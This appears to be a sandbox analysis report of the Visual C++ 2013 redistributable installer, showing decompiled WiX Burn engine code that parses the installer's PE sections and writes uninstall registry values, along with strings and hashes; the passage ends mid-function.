String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$package.cpp
API String ID: 336948655-3675780287
Opcode ID: be3f65b5b959f6eba1c3aa452357f40eba8721b6f4fcc4038b3ec63601ad17be
Instruction ID: 7a4efa841e7e38db11f0b8ef663b22b9b9f216721ddd2b3d2286874f1fe1c9e2
Opcode Fuzzy Hash: be3f65b5b959f6eba1c3aa452357f40eba8721b6f4fcc4038b3ec63601ad17be
Instruction Fuzzy Hash: 8D22D171A6124BEFCB11BF94CCC1FADBBB6EB54350F204129E615AB280DB75EA518B10

Uniqueness

Uniqueness Score: -1.00%

Function 0128209F Relevance: 96.8, APIs: 28, Strings: 27, Instructions: 576
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0128209F(union _LARGE_INTEGER* __edx, void** _a4) {
				signed int _v8;
				union _LARGE_INTEGER _v12;
				void _v72;
				signed short _v300;
				signed int _v314;
				void _v320;
				union _LARGE_INTEGER _v340;
				long _v344;
				char _v352;
				void _v360;
				long _v364;
				void* _v368;
				struct _OVERLAPPED* _v372;
				signed int _v376;
				void _v380;
				void _v384;
				struct _OVERLAPPED* _v388;
				struct _OVERLAPPED* _v392;
				union _LARGE_INTEGER* _v396;
				union _LARGE_INTEGER _v400;
				void* _v404;
				struct _OVERLAPPED* _v408;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t108;
				void* _t120;
				int _t121;
				int _t131;
				int _t134;
				struct %anon52 _t136;
				union _LARGE_INTEGER _t137;
				int _t138;
				int _t147;
				signed int _t151;
				int _t159;
				void* _t167;
				void* _t179;
				void* _t184;
				signed int _t189;
				signed int _t192;
				signed int _t202;
				signed int _t205;
				signed int _t208;
				signed int _t211;
				signed int _t214;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t226;
				void** _t229;
				signed int _t230;
				void* _t242;
				union _LARGE_INTEGER* _t250;
				void* _t253;
				void* _t254;
				signed int _t256;
				signed int _t260;

				_t250 = __edx;
				_t108 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t108 ^ _t260;
				_t229 = _a4;
				asm("stosd");
				asm("stosd");
				_v372 = 0;
				_v364 = 0;
				_v392 = 0;
				_v388 = 0;
				E012A7E30( &_v72, 0, 0x40);
				E012A7E30( &_v320, 0, 0xf8);
				 *_t229 =  *_t229 | 0xffffffff;
				asm("stosd");
				asm("stosd");
				_t230 = 8;
				_t253 =  &_v352;
				memset(_t253, 0, _t230 << 2);
				_t254 = _t253 + _t230;
				_v384 = 0;
				_v380 = 0;
				_v408 = 0;
				_t256 = E012B1A74( &_v372, 0);
				if(_t256 >= 0) {
					_t120 = CreateFileW(_v372, 0x80000000, 5, 0, 3, 0x80, 0); // executed
					 *_t229 = _t120;
					if(_t120 != 0xffffffff) {
						_t254 = SetFilePointerEx;
						_push(0);
						_t121 = SetFilePointerEx(_t120, _v400, _v396, 0); // executed
						if(_t121 != 0) {
							_t124 = ReadFile( *_t229,  &_v72, 0x40,  &_v364, 0); // executed
							if(_t124 != 0) {
								if(_v364 < 0x40) {
									L24:
									_t256 = 0x8007000d;
									E012B294E(_t124, "section.cpp", 0x57, 0x8007000d);
									_push("Failed to find valid DOS image header in buffer.");
									L2:
									_push(_t256);
									E012AFA86();
									L82:
									if(_v372 != 0) {
										E012B01E8(_v372);
									}
									return E012A7EAA(_t256, _t229, _v8 ^ _t260, _t250, _t254, _t256);
								}
								_t124 = 0x5a4d;
								if(0x5a4d == _v72) {
									_push(0);
									asm("cdq");
									_t131 = SetFilePointerEx( *_t229, _v12.LowPart, _t250, 0); // executed
									if(_t131 != 0) {
										_t134 = ReadFile( *_t229,  &_v320, 0x18,  &_v364, 0); // executed
										if(_t134 != 0) {
											if(_v364 < 0x18 || _v320 != 0x4550) {
												_t256 = 0x8007000d;
												E012B294E(_t134, "section.cpp", 0x6d, 0x8007000d);
												_push("Failed to find valid NT image header in buffer.");
											} else {
												_t136 = _v12.LowPart;
												_v404 = _t136 + 0x58;
												_push(0);
												_t137 = _t136 + 0x98;
												_v396 = _t137;
												_t138 = SetFilePointerEx( *_t229, _t137, 0, 0); // executed
												if(_t138 != 0) {
													if(ReadFile( *_t229,  &_v384, 4,  &_v364, 0) != 0) {
														if(ReadFile( *_t229,  &_v380, 4,  &_v364, 0) != 0) {
															_push(0);
															_t147 = SetFilePointerEx( *_t229, (_v300 & 0x0000ffff) + _v12 + 0x18, 0, 0); // executed
															if(_t147 != 0) {
																_v376 = _v376 & 0x00000000;
																if(ReadFile( *_t229,  &_v360, 0x28,  &_v364, 0) == 0) {
																	L72:
																	_t151 = GetLastError();
																	if(_t151 > 0) {
																		_t151 = _t151 & 0x0000ffff | 0x80070000;
																	}
																	_t256 = _t151;
																	if(_t256 >= 0) {
																		_t256 = 0x80004005;
																	}
																	E012B294E(_t151, "section.cpp", 0x96, _t256);
																	_push(_v376);
																	_push("Failed to read image section header, index: %u");
																	L9:
																	_push(_t256);
																	E012AFA86();
																	goto L82;
																}
																_v368 = 1;
																while(_v364 >= 0x28) {
																	_push(8);
																	_t254 = ".wixburn";
																	asm("repe cmpsb");
																	if(0 != 0) {
																		asm("sbb eax, eax");
																		asm("sbb eax, 0xffffffff");
																	}
																	if(0 == 0) {
																		if(_v344 >= 0x34) {
																			_t254 = E012B233B(_v344, 1);
																			if(_t254 != 0) {
																				_push(0);
																				_t159 = SetFilePointerEx( *_t229, _v340.LowPart, 0, 0); // executed
																				if(_t159 != 0) {
																					_v368 = _v340 + 0x1c;
																					if(ReadFile( *_t229, _t254, _v344,  &_v364, 0) != 0) {
																						_t164 = _v344;
																						if(_v344 <= _v364) {
																							if( *((intOrPtr*)(_t254 + 4)) == 2) {
																								_t256 = E012B56AA(0,  *_t229,  &_v392);
																								if(_t256 >= 0) {
																									_t167 =  *(_t254 + 0x18);
																									_t229[1] = _t167;
																									_t242 =  *(_t254 + 0x20);
																									if(_t242 == 0) {
																										_t242 = _v384;
																										if(_t242 == 0) {
																											_t229[2] =  *((intOrPtr*)(_t254 + 0x30)) + _t167;
																											L114:
																											_t229[4] = _v392;
																											_t229[5] = _v388;
																											_t229[6] = _v404;
																											_t229[7] = _v396;
																											_t229[8] = _v368;
																											_t229[9] =  *(_t254 + 0x1c);
																											_t229[0xa] =  *(_t254 + 0x20);
																											_t229[0xb] =  *(_t254 + 0x24);
																											_t229[0xc] =  *(_t254 + 0x28);
																											_t229[0xd] =  *(_t254 + 0x2c);
																											_t179 = E012B233B( *(_t254 + 0x2c) << 2, 1);
																											_t229[0xe] = _t179;
																											if(_t179 != 0) {
																												_t107 = _t254 + 0x30; // 0x30
																												E012A7EC0(_t179, _t107, _t229[0xd] << 2);
																												L117:
																												goto L80;
																											}
																											_t256 = 0x8007000e;
																											E012B294E(_t179, "section.cpp", 0xf8, 0x8007000e);
																											_push("Failed to allocate memory for container sizes.");
																											L95:
																											_push(_t256);
																											E012AFA86();
																											goto L79;
																										}
																										_t184 = _v380;
																										L112:
																										_t229[2] = _t184 + _t242;
																										goto L114;
																									}
																									_t184 =  *(_t254 + 0x24);
																									goto L112;
																								}
																								_push("Failed to get total size of bundle.");
																								goto L95;
																							}
																							_t256 = 0x8007000d;
																							E012B294E(_t164, "section.cpp", 0xd5, 0x8007000d);
																							E012AFA86(0x8007000d, "Failed to read section info, unsupported version: %08x",  *((intOrPtr*)(_t254 + 4)));
																							goto L117;
																						}
																						_t256 = 0x8007000d;
																						E012B294E(_t164, "section.cpp", 0xce, 0x8007000d);
																						_push("Failed to read complete section info.");
																						goto L95;
																					}
																					_t189 = GetLastError();
																					if(_t189 > 0) {
																						_t189 = _t189 & 0x0000ffff | 0x80070000;
																					}
																					_t256 = _t189;
																					if(_t256 >= 0) {
																						_t256 = 0x80004005;
																					}
																					E012B294E(_t189, "section.cpp", 0xc9, _t256);
																					_push("Failed to read section info.");
																					goto L95;
																				}
																				_t192 = GetLastError();
																				if(_t192 > 0) {
																					_t192 = _t192 & 0x0000ffff | 0x80070000;
																				}
																				_t256 = _t192;
																				if(_t256 >= 0) {
																					_t256 = 0x80004005;
																				}
																				E012B294E(_t192, "section.cpp", 0xc0, _t256);
																				_push("Failed to seek to section info.");
																				goto L95;
																			}
																			_t256 = 0x8007000e;
																			E012B294E(_t157, "section.cpp", 0xba, 0x8007000e);
																			_push("Failed to allocate buffer for section info.");
																			goto L2;
																		}
																		_t256 = 0x8007000d;
																		E012B294E(0, "section.cpp", 0xb5, 0x8007000d);
																		_push(_v344);
																		_push("Failed to read section info, data to short: %u");
																		goto L9;
																	} else {
																		_t197 = _v314 & 0x0000ffff;
																		if(_v368 >= (_v314 & 0x0000ffff)) {
																			_t256 = 0x8007000d;
																			E012B294E(_t197, "section.cpp", 0xa9, 0x8007000d);
																			_push("Failed to find Burn section.");
																			_push(0x8007000d);
																			E012AFA86();
																			_t254 = _v408;
																			L79:
																			L80:
																			if(_t254 != 0) {
																				E012B24F6(_t254);
																			}
																			goto L82;
																		}
																		_v376 = _v376 + 1;
																		_v368 = _v368 + 1;
																		if(ReadFile( *_t229,  &_v360, 0x28,  &_v364, 0) != 0) {
																			continue;
																		}
																		goto L72;
																	}
																}
																_t256 = 0x8007000d;
																E012B294E(_t150, "section.cpp", 0x9b, 0x8007000d);
																_push(_v376);
																_push("Failed to read complete image section header, index: %u");
																goto L9;
															}
															_t202 = GetLastError();
															if(_t202 > 0) {
																_t202 = _t202 & 0x0000ffff | 0x80070000;
															}
															_t256 = _t202;
															if(_t256 >= 0) {
																_t256 = 0x80004005;
															}
															E012B294E(_t202, "section.cpp", 0x8d, _t256);
															_push("Failed to seek past optional headers.");
															goto L2;
														}
														_t205 = GetLastError();
														if(_t205 > 0) {
															_t205 = _t205 & 0x0000ffff | 0x80070000;
														}
														_t256 = _t205;
														if(_t256 >= 0) {
															_t256 = 0x80004005;
														}
														E012B294E(_t205, "section.cpp", 0x82, _t256);
														_push("Failed to read signature size.");
														goto L2;
													}
													_t208 = GetLastError();
													if(_t208 > 0) {
														_t208 = _t208 & 0x0000ffff | 0x80070000;
													}
													_t256 = _t208;
													if(_t256 >= 0) {
														_t256 = 0x80004005;
													}
													E012B294E(_t208, "section.cpp", 0x7d, _t256);
													_push("Failed to read signature offset.");
													goto L2;
												}
												_t211 = GetLastError();
												if(_t211 > 0) {
													_t211 = _t211 & 0x0000ffff | 0x80070000;
												}
												_t256 = _t211;
												if(_t256 >= 0) {
													_t256 = 0x80004005;
												}
												E012B294E(_t211, "section.cpp", 0x78, _t256);
												_push("Failed to seek to section info.");
											}
											goto L2;
										}
										_t214 = GetLastError();
										if(_t214 > 0) {
											_t214 = _t214 & 0x0000ffff | 0x80070000;
										}
										_t256 = _t214;
										if(_t256 >= 0) {
											_t256 = 0x80004005;
										}
										E012B294E(_t214, "section.cpp", 0x68, _t256);
										_push("Failed to read NT header.");
										goto L2;
									}
									_t217 = GetLastError();
									if(_t217 > 0) {
										_t217 = _t217 & 0x0000ffff | 0x80070000;
									}
									_t256 = _t217;
									if(_t256 >= 0) {
										_t256 = 0x80004005;
									}
									E012B294E(_t217, "section.cpp", 0x62, _t256);
									_push("Failed to seek to NT header.");
									goto L2;
								}
								goto L24;
							}
							_t220 = GetLastError();
							if(_t220 > 0) {
								_t220 = _t220 & 0x0000ffff | 0x80070000;
							}
							_t256 = _t220;
							if(_t256 >= 0) {
								_t256 = 0x80004005;
							}
							E012B294E(_t220, "section.cpp", 0x52, _t256);
							_push("Failed to read DOS header.");
							goto L2;
						}
						_t223 = GetLastError();
						if(_t223 > 0) {
							_t223 = _t223 & 0x0000ffff | 0x80070000;
						}
						_t256 = _t223;
						if(_t256 >= 0) {
							_t256 = 0x80004005;
						}
						E012B294E(_t223, "section.cpp", 0x4c, _t256);
						_push("Failed to seek to start of file.");
						goto L2;
					}
					_t226 = GetLastError();
					if(_t226 > 0) {
						_t226 = _t226 & 0x0000ffff | 0x80070000;
					}
					_t256 = _t226;
					if(_t256 >= 0) {
						_t256 = 0x80004005;
					}
					E012B294E(_t226, "section.cpp", 0x45, _t256);
					_push(_v372);
					_push("Failed to open handle to engine process path: %ls");
					goto L9;
				}
				_push("Failed to get path to engine process.");
				goto L2;
			}

0x0128209f
0x012820a8
0x012820af
0x012820b3
0x012820c0
0x012820c5
0x012820cb
0x012820d1
0x012820d7
0x012820dd
0x012820e3
0x012820f5
0x012820fa
0x01282108
0x01282109
0x0128210c
0x0128210f
0x01282115
0x01282115
0x0128211f
0x01282125
0x0128212b
0x01282136
0x0128213a
0x01282166
0x0128216c
0x01282171
0x012821b8
0x012821be
0x012821cf
0x012821d3
0x01282222
0x01282226
0x01282265
0x01282272
0x01282272
0x0128227f
0x01282284
0x01282141
0x01282141
0x01282142
0x012825d6
0x012825dd
0x012825e5
0x012825e5
0x012825fa
0x012825fa
0x01282267
0x01282270
0x01282291
0x01282293
0x0128229a
0x0128229e
0x012822ea
0x012822ee
0x0128232d
0x0128233b
0x01282348
0x0128234d
0x01282357
0x01282357
0x0128235d
0x01282365
0x01282367
0x01282370
0x01282376
0x0128237a
0x012823ca
0x0128241a
0x01282465
0x0128246b
0x0128246f
0x012824aa
0x012824c9
0x01282540
0x01282540
0x01282548
0x0128254f
0x0128254f
0x01282554
0x01282558
0x0128255a
0x0128255a
0x0128256a
0x0128256f
0x01282575
0x012821aa
0x012821aa
0x012821ab
0x00000000
0x012821b0
0x012824cb
0x012824d5
0x012824e2
0x012824e5
0x012824f2
0x012824f4
0x012824f6
0x012824f8
0x012824f8
0x012824fd
0x01282604
0x01282638
0x0128263e
0x01282665
0x0128266d
0x01282675
0x012826c0
0x012826de
0x01282716
0x01282722
0x01282747
0x0128277f
0x01282783
0x0128278f
0x01282792
0x01282795
0x0128279a
0x012827a1
0x012827a9
0x012827bd
0x012827c0
0x012827c6
0x012827cf
0x012827d8
0x012827e1
0x012827ea
0x012827f0
0x012827f6
0x012827fc
0x01282802
0x01282808
0x01282811
0x01282816
0x0128281b
0x01282843
0x01282848
0x0128284d
0x00000000
0x0128284d
0x0128281d
0x0128282d
0x01282832
0x012826ab
0x012826ab
0x012826ac
0x00000000
0x012826ac
0x012827ab
0x012827b1
0x012827b3
0x00000000
0x012827b3
0x0128279c
0x00000000
0x0128279c
0x01282785
0x00000000
0x01282785
0x01282749
0x01282759
0x01282767
0x00000000
0x01282767
0x01282724
0x01282734
0x01282739
0x00000000
0x01282739
0x012826e0
0x012826e8
0x012826ef
0x012826ef
0x012826f4
0x012826f8
0x012826fa
0x012826fa
0x0128270a
0x0128270f
0x00000000
0x0128270f
0x01282677
0x0128267f
0x01282686
0x01282686
0x0128268b
0x0128268f
0x01282691
0x01282691
0x012826a1
0x012826a6
0x00000000
0x012826a6
0x01282640
0x01282650
0x01282655
0x00000000
0x01282655
0x01282606
0x01282616
0x0128261b
0x01282621
0x00000000
0x01282503
0x01282503
0x01282510
0x012825a4
0x012825b4
0x012825b9
0x012825be
0x012825bf
0x012825c4
0x012825ca
0x012825cc
0x012825ce
0x012825d1
0x012825d1
0x00000000
0x012825ce
0x01282516
0x0128251c
0x0128253e
0x00000000
0x00000000
0x00000000
0x0128253e
0x012824fd
0x0128257f
0x0128258f
0x01282594
0x0128259a
0x00000000
0x0128259a
0x01282471
0x01282479
0x01282480
0x01282480
0x01282485
0x01282489
0x0128248b
0x0128248b
0x0128249b
0x012824a0
0x00000000
0x012824a0
0x0128241c
0x01282424
0x0128242b
0x0128242b
0x01282430
0x01282434
0x01282436
0x01282436
0x01282446
0x0128244b
0x00000000
0x0128244b
0x012823cc
0x012823d4
0x012823db
0x012823db
0x012823e0
0x012823e4
0x012823e6
0x012823e6
0x012823f3
0x012823f8
0x00000000
0x012823f8
0x0128237c
0x01282384
0x0128238b
0x0128238b
0x01282390
0x01282394
0x01282396
0x01282396
0x012823a3
0x012823a8
0x012823a8
0x00000000
0x0128232d
0x012822f0
0x012822f8
0x012822ff
0x012822ff
0x01282304
0x01282308
0x0128230a
0x0128230a
0x01282317
0x0128231c
0x00000000
0x0128231c
0x012822a0
0x012822a8
0x012822af
0x012822af
0x012822b4
0x012822b8
0x012822ba
0x012822ba
0x012822c7
0x012822cc
0x00000000
0x012822cc
0x00000000
0x01282270
0x01282228
0x01282230
0x01282237
0x01282237
0x0128223c
0x01282240
0x01282242
0x01282242
0x0128224f
0x01282254
0x00000000
0x01282254
0x012821d5
0x012821dd
0x012821e4
0x012821e4
0x012821e9
0x012821ed
0x012821ef
0x012821ef
0x012821fc
0x01282201
0x00000000
0x01282201
0x01282173
0x0128217b
0x01282182
0x01282182
0x01282187
0x0128218b
0x0128218d
0x0128218d
0x0128219a
0x0128219f
0x012821a5
0x00000000
0x012821a5
0x0128213c
0x00000000

APIs

_memset.LIBCMT ref: 012820E3
_memset.LIBCMT ref: 012820F5

Part of subcall function 012B1A74: GetModuleFileNameW.KERNEL32(01282136,?,00000104,?,00000104,?,00000000,?,?,01282136,?,00000000,?,?,?,773D9EB0), ref: 012B1A95

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000,?,?,?,773D9EB0,?,00000000), ref: 01282166
GetLastError.KERNEL32(?,?,?,773D9EB0,?,00000000), ref: 01282173

Strings

Failed to read section info, unsupported version: %08x, xrefs: 01282761
Failed to allocate memory for container sizes., xrefs: 01282832
Failed to seek to section info., xrefs: 012823A8, 012826A6
Failed to seek to NT header., xrefs: 012822CC
.wixburn, xrefs: 012824E5
Failed to read DOS header., xrefs: 01282254
Failed to read image section header, index: %u, xrefs: 01282575
Failed to seek past optional headers., xrefs: 012824A0
Failed to open handle to engine process path: %ls, xrefs: 012821A5
Failed to read section info, data to short: %u, xrefs: 01282621
Failed to seek to start of file., xrefs: 01282201
Failed to get path to engine process., xrefs: 0128213C
Failed to allocate buffer for section info., xrefs: 01282655
Failed to read NT header., xrefs: 0128231C
section.cpp, xrefs: 01282195, 012821F7, 0128224A, 0128227A, 012822C2, 01282312, 01282343, 0128239E, 012823EE, 01282441, 01282496, 01282565, 0128258A, 012825AF, 01282611, 0128264B, 0128269C, 01282705, 0128272F, 01282754, 01282828
Failed to read section info., xrefs: 0128270F
Failed to find valid DOS image header in buffer., xrefs: 01282284
Failed to read signature offset., xrefs: 012823F8
Failed to find valid NT image header in buffer., xrefs: 0128234D
Failed to read complete image section header, index: %u, xrefs: 0128259A
PE, xrefs: 0128232F
Failed to get total size of bundle., xrefs: 01282785
(, xrefs: 012824D5
Failed to read signature size., xrefs: 0128244B
Failed to find Burn section., xrefs: 012825B9
4, xrefs: 012825FD
Failed to read complete section info., xrefs: 01282739

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: File_memset$CreateErrorLastModuleName
String ID: ($.wixburn$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get path to engine process.$Failed to get total size of bundle.$Failed to open handle to engine process path: %ls$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$section.cpp
API String ID: 3151910114-3305245485
Opcode ID: acec97fbe840e9f31a8f63baedccc98c2a6fff912ab4fd9a963eef3e670cedf8
Instruction ID: 86782d8d5ae4c872350a682b340af86de13444648a64339c50b54279e095473c
Opcode Fuzzy Hash: acec97fbe840e9f31a8f63baedccc98c2a6fff912ab4fd9a963eef3e670cedf8
Instruction Fuzzy Hash: A1121A71A71627EBDB30AB24CD85FEA7AB8AF04750F1001A5BA09FB1D0D7759D40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01286C31 Relevance: 82.7, APIs: 1, Strings: 46, Instructions: 444
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E01286C31(signed int __ecx, unsigned int __edx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28, unsigned int _a32) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* __ebx;
				void* __esi;
				signed int _t114;
				signed int _t117;
				signed int _t122;
				unsigned int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				unsigned int _t132;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				intOrPtr _t152;
				signed int _t153;
				char* _t154;
				signed int _t155;
				signed int _t161;
				signed int _t162;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				signed int _t180;
				signed int _t187;
				unsigned int _t194;
				void* _t195;
				intOrPtr* _t198;
				void* _t199;
				void* _t200;

				_t195 = __edi;
				_t192 = __edx;
				_t183 = __ecx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t198 = _a8;
				_t6 = _t198 + 8; // 0xc533012d
				_push(E01291879( *_t6));
				_push(_a20);
				_t8 = _t198 + 0x50; // 0x57cf33b
				E01281566(3, 0x20000172,  *_t8);
				_t200 = _t199 + 0x14;
				if((_a20 & 0x00000001) == 0) {
					L3:
					_t18 = _t198 + 0x50; // 0x57cf33b
					_t19 = _t198 + 0x4c; // 0xf08b8007, executed
					_t114 = E012B36CB( *_t19,  *_t18, 0x20006,  &_v8); // executed
					_t180 = _t114;
					__eflags = _t180;
					if(_t180 >= 0) {
						__eflags = _a20 & 0x00000002;
						_push(_t195);
						if((_a20 & 0x00000002) == 0) {
							L60:
							__eflags = _a20 & 0x00000004;
							if((_a20 & 0x00000004) == 0) {
								L70:
								__eflags = _a24 - 1;
								if(_a24 != 1) {
									L73:
									_t117 = E01286893(1, _t183, _t192, _t198, _v8, 0); // executed
									_t180 = _t117;
									__eflags = _t180;
									if(_t180 < 0) {
										_push("Failed to update resume mode.");
										goto L75;
									}
								} else {
									_t122 = E0129F78A(_t183, _t192, _t198); // executed
									_t180 = _t122;
									__eflags = _t180;
									if(_t180 >= 0) {
										goto L73;
									} else {
										_push("Failed to register the bundle dependency key.");
										goto L75;
									}
								}
							} else {
								_t123 = _a32;
								_t183 = (_t123 << 0x00000020 | _a28) >> 0xa;
								_t124 = _t123 >> 0xa;
								__eflags = _t124;
								if(__eflags < 0) {
									goto L70;
								} else {
									if(__eflags > 0) {
										L67:
										__eflags = _t183;
										goto L68;
									} else {
										__eflags = _t183;
										if(_t183 == 0) {
											goto L70;
										} else {
											__eflags = _t124;
											if(__eflags >= 0) {
												if(__eflags > 0) {
													goto L67;
												} else {
													__eflags = _t183 - 0xffffffff;
													if(_t183 > 0xffffffff) {
														goto L67;
													}
												}
											}
											L68:
											_t197 = L"EstimatedSize";
											_t125 = E012B362A(_v8, L"EstimatedSize", _t183); // executed
											_t180 = _t125;
											__eflags = _t180;
											if(_t180 >= 0) {
												goto L70;
											} else {
												goto L69;
											}
										}
									}
								}
							}
						} else {
							_t23 = _t198 + 0x54; // 0x4005be
							_t197 = L"BundleCachePath";
							_t127 = E012B3B02(_t183, _t192, _v8, L"BundleCachePath",  *_t23); // executed
							_t180 = _t127;
							__eflags = _t180;
							if(_t180 < 0) {
								L69:
								E012AFA86(_t180, "Failed to write %ls value.", _t197);
							} else {
								_t25 = _t198 + 0x24; // 0x5d89e85d
								_t197 = L"BundleUpgradeCode";
								_t26 = _t198 + 0x20; // 0x89206adb
								_t128 = E012B3BEA(_t180, L"BundleUpgradeCode", _t198, _v8, L"BundleUpgradeCode",  *_t26,  *_t25); // executed
								_t180 = _t128;
								__eflags = _t180;
								if(_t180 < 0) {
									goto L69;
								} else {
									_t28 = _t198 + 0x2c; // 0x50012ba2
									_t197 = L"BundleAddonCode";
									_t29 = _t198 + 0x28; // 0x8815ffe4
									_t129 = E012B3BEA(_t180, L"BundleAddonCode", _t198, _v8, L"BundleAddonCode",  *_t29,  *_t28); // executed
									_t180 = _t129;
									__eflags = _t180;
									if(_t180 < 0) {
										goto L69;
									} else {
										_t31 = _t198 + 0x1c; // 0x3350e845
										_t197 = L"BundleDetectCode";
										_t32 = _t198 + 0x18; // 0x8dababab
										_t130 = E012B3BEA(_t180, L"BundleDetectCode", _t198, _v8, L"BundleDetectCode",  *_t32,  *_t31); // executed
										_t180 = _t130;
										__eflags = _t180;
										if(_t180 < 0) {
											goto L69;
										} else {
											_t34 = _t198 + 0x34; // 0xc085012b
											_t197 = L"BundlePatchCode";
											_t35 = _t198 + 0x30; // 0xa00815ff
											_t131 = E012B3BEA(_t180, L"BundlePatchCode", _t198, _v8, L"BundlePatchCode",  *_t35,  *_t34); // executed
											_t180 = _t131;
											__eflags = _t180;
											if(_t180 < 0) {
												goto L69;
											} else {
												_t37 = _t198 + 0x38; // 0x15ff3975
												_t187 =  *_t37;
												_t38 = _t198 + 0x3c; // 0x12ba224
												_t132 =  *_t38;
												_push(_t187 & 0x0000ffff);
												_t194 = _t132;
												_push((_t194 << 0x00000020 | _t187) >> 0x10 & 0x0000ffff);
												_t183 = _t132 & 0x0000ffff;
												_push(_t132 & 0x0000ffff);
												_v16 = _t132;
												_t197 = L"BundleVersion";
												_t192 = _t194 >> 0x10; // executed
												_t134 = E012B3BA8(_t132 & 0x0000ffff, _t194 >> 0x10, _v8, L"BundleVersion", L"%hu.%hu.%hu.%hu", _t132 >> 0x10); // executed
												_t180 = _t134;
												_t200 = _t200 + 0x1c;
												__eflags = _t180;
												if(_t180 < 0) {
													goto L69;
												} else {
													_t45 = _t198 + 0x44; // 0xffff25
													_t135 =  *_t45;
													__eflags = _t135;
													if(_t135 == 0) {
														L14:
														_t47 = _t198 + 0x14; // 0xabec7d8d
														_t136 =  *_t47;
														__eflags = _t136;
														if(_t136 == 0) {
															L16:
															_t197 = L"EngineVersion";
															_t137 = E012B3BA8(_t183, _t192, _v8, L"EngineVersion", L"%hs", "3.7.2829.0"); // executed
															_t180 = _t137;
															_t200 = _t200 + 0x10;
															__eflags = _t180;
															if(_t180 < 0) {
																goto L69;
															} else {
																_t50 = _t198 + 0x54; // 0x4005be
																_t197 = L"DisplayIcon";
																_t138 = E012B3BA8(_t183, _t192, _v8, L"DisplayIcon", L"%s,0",  *_t50); // executed
																_t180 = _t138;
																_t200 = _t200 + 0x10;
																__eflags = _t180;
																if(_t180 < 0) {
																	goto L69;
																} else {
																	_t140 = E01285B5A(_t198, _t183, _t192, _a12,  &_v12);
																	__eflags = _t140;
																	_t141 = _v12;
																	if(_t140 < 0) {
																		_t55 = _t198 + 0x60; // 0x12ba6e4
																		_t141 =  *_t55;
																	}
																	_t197 = L"DisplayName";
																	_t142 = E012B3B02(_t183, _t192, _v8, L"DisplayName", _t141); // executed
																	_t180 = _t142;
																	__eflags = _t180;
																	if(_t180 < 0) {
																		goto L69;
																	} else {
																		_t57 = _t198 + 0x64; // 0x3152ae8
																		_t143 =  *_t57;
																		__eflags = _t143;
																		if(_t143 == 0) {
																			L23:
																			_t59 = _t198 + 0x68; // 0xa6c46800
																			_t144 =  *_t59;
																			__eflags = _t144;
																			if(_t144 == 0) {
																				L25:
																				_t61 = _t198 + 0x6c; // 0x11e9012b
																				_t145 =  *_t61;
																				__eflags = _t145;
																				if(_t145 == 0) {
																					L27:
																					_t63 = _t198 + 0x70; // 0x8d000001
																					_t146 =  *_t63;
																					__eflags = _t146;
																					if(_t146 == 0) {
																						L29:
																						_t65 = _t198 + 0x74; // 0x3350f045
																						_t147 =  *_t65;
																						__eflags = _t147;
																						if(_t147 == 0) {
																							L31:
																							_t67 = _t198 + 0x78; // 0xa69c68ff
